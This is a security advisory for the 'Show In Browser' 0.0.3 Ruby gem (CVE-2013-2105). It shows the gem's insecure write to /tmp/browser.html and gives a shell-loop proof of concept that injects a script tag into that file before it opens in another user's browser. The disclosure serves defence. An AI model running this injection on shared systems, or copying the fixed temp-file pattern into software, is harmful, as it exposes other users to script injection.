TITLE
: Show In Browser
0
.
0
.
3
Ruby Gem /tmp file injection vulnerability.
DATE
:
5
/
15
/
2023
AUTHOR
: Larry
W
. Cashdollar (
@_larry0
)
DESCRIPTION
: Opens arbitrary text
in
your browser
VENDOR
: Jonathan Leung
FIX
:
N
/
A
CVE
:
2013
-
2105
DETAILS
: The following code uses the temporary file
"/tmp/browser.html"
insecurely.
2
FILE_LOCATION
=
"/tmp/browser.html"
3
4
class
<<
self
5
6
def
show(html)
7
file =
File
.open(
FILE_LOCATION
,
'w'
)
8
file.write(html)
9
file.close
10
11
`open
#{FILE_LOCATION}`
By a malicious user creating /tmp/browser.html first
and
repeatedly writing to it they can inject malicious html into
the file right before it is about to be opened.
PoC:
nobody () pitter:/$
while
(
true
);
do
echo
"<script> alert('Hello'); </script>"
>> /tmp/browser.html; done
Will pop up a java script alert
in
other gem users browser.